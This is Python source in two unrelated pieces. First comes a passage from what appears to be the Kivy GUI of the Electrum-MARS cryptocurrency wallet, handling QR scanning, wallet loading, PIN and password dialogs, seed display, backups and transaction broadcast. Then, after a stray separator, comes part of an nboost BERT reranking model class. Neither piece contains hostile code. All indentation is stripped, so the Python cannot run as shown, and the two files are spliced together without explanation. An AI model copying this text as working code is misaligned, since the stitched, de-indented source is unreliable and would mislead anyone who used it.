bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum_mars.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum_mars import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
if data is not None:
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
else:
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups:
warning = _(messages.MSG_LIGHTNING_WARNING)
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def swap_dialog(self):
d = SwapDialog(self, self.electrum_config)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
self.show_error(_("Not available for this wallet.") + "\n\n" +
_("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_mars.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_mars.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_mars_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_mars_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-mars.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might be not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum_mars.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return self.electrum_config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
# FIXME this is using format_satoshis_plain instead of config.format_amount
# as we sometimes convert the returned string back to numbers,
# via self.get_amount()... the need for converting back should be removed
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_amount_and_units_with_fiat(self, x) -> str:
text = self.format_amount_and_units(x)
fiat = self.fx.format_amount_and_units(x) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-MARS', message,
app_icon=icon, app_name='Electrum-MARS')
except ImportError:
self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
else:
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
backup_dir = util.android_backup_dir()
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
def lightning_status(self):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
status = _('Enabled')
else:
status = _('Enabled, non-recoverable channels')
else:
if self.wallet.can_have_lightning():
status = _('Not enabled')
else:
status = _("Not available for this wallet.")
return status
def on_lightning_status(self, root):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
pass
else:
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
self.show_info(msg)
elif self.wallet.can_have_lightning():
root.dismiss()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
d = Question(msg, self._enable_lightning, title=_('Enable Lightning?'))
d.open()
def _enable_lightning(self, b):
if not b:
return
self.wallet.init_lightning(password=self.password)
self.show_info(_('Lightning keys have been initialized.'))
|
__init__.py
|
from threading import Thread
from typing import List
import tensorflow as tf
from queue import Queue
import numpy as np
from nboost.model.bert_model import modeling, tokenization
from nboost.model.base import BaseModel
class BertModel(BaseModel):
def __init__(self, verbose=False, **kwargs):
super().__init__(**kwargs)
self.download()
self.output_q = Queue()
self.input_q = Queue()
ckpts = list(self.model_dir.glob('*.ckpt*'))
if not len(ckpts) > 0:
raise FileNotFoundError("Tensorflow model not found")
self.checkpoint = str(ckpts[0]).split('.ckpt')[0] + '.ckpt'
self.vocab_file = str(self.model_dir.joinpath('vocab.txt'))
self.bert_config_file = str(self.model_dir.joinpath('bert_config.json'))
if not verbose:
tf.logging.set_verbosity(tf.logging.ERROR)
self.model_thread = Thread(target=self.run_model)
self.model_thread.start()
@staticmethod
def create_model(bert_config, input_ids, input_mask, segment_ids,
labels, num_labels):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=False,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=False)
output_layer = model.get_pooled_output()
hidden_size = output_layer.shape[-1].value
output_weights = tf.get_variable(
"output_weights", [num_labels, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [num_labels], initializer=tf.zeros_initializer())
with tf.variable_scope("loss"):
logits = tf.matmul(output_layer, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
one_hot_labels = tf.one_hot(labels, depth=num_labels, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def model_fn_builder(self, bert_config, num_labels, init_checkpoint):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
label_ids = features["label_ids"]
(total_loss, per_example_loss, log_probs) = self.create_model(
bert_config, input_ids, input_mask, segment_ids, label_ids,
num_labels)
tvars = tf.trainable_variables()
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
output_spec = tf.estimator.EstimatorSpec(
mode=mode,
predictions={
"log_probs": log_probs,
"label_ids": label_ids,
})
return output_spec
return model_fn
def input_fn(self):
"""The actual input function."""
output_types = {
"input_ids": tf.int32,
"segment_ids": tf.int32,
"input_mask": tf.int32,
"label_ids": tf.int32,
}
dataset = tf.data.Dataset.from_generator(self.feature_generator, output_types)
dataset = dataset.padded_batch(
batch_size=self.batch_size,
padded_shapes={
"input_ids": [self.max_seq_len],
"segment_ids": [self.max_seq_len],
"input_mask": [self.max_seq_len],
"label_ids": [],
},
padding_values={
"input_ids": 0,
"segment_ids": 0,
"input_mask": 0,
"label_ids": 0,
},
drop_remainder=True)
return dataset
